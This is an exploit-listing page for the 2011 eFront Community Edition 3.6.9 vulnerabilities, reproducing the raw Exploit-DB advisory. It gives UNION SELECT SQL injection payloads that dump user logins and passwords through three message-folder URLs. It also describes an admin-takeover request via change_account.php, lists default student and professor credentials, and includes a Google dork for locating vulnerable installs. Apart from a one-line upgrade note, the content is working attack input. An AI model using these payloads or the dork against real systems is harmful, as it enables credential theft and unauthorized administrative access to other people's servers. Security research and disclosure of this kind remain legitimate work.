EFront - exploit.company

vendor:

EFront Community Edition

by:

IHTeam

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: EFront Community Edition

Affected Version From: 3.6.2009

Affected Version To: 3.6.2009

Patch Exists: YES

Related CWE: N/A

CPE: efront

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

EFront <= 3.6.9 Community Edition Multiple Vulnerabilities

The EFront Community Edition version 3.6.9 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending a crafted request to the vulnerable application. The vulnerable requests are: www/student.php?ctg=messages&folder=<valid folder id> UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users --, www/professor.php?ctg=messages&folder=<valid folder id> UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users --, www/admin.php?ctg=messages&folder=<valid folder id> UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users --

Mitigation:

Upgrade to the latest version of EFront Community Edition, which is 3.6.10.

Source

Exploit-DB raw data:

# Exploit Title: EFront <= 3.6.9 Community Edition Multiple Vulnerabilities
# Google Dork: "eFront (version 3.6.9)" inurl:index.php?ctg=*
# Date: 5/09/2011
# Public release: When 3.6.10 will be released
# Author: IHTeam
# Software Link: http://www.efrontlearning.net/download/download-efront.html
# Tested on: efront_3.6.9_build11018
# Original Advisory: http://iht.li/FWh
# Advisory code: http://iht.li/p/0VV

Default username and password:
student:student
professor:professor

How to become admin:
Request 1: /change_account.php?login=admin
Request 2: /userpage.php
OR
simple use the [Switch account] option on top of the page;
Now you are in admin area;

SQL Injection:
www/student.php?ctg=messages&folder=<valid folder id> UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users --
www/professor.php?ctg=messages&folder=<valid folder id> UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users --
www/admin.php?ctg=messages&folder=<valid folder id> UNION ALL SELECT 1,2,3,password,5,6,login,8,9,10,11,12 FROM users --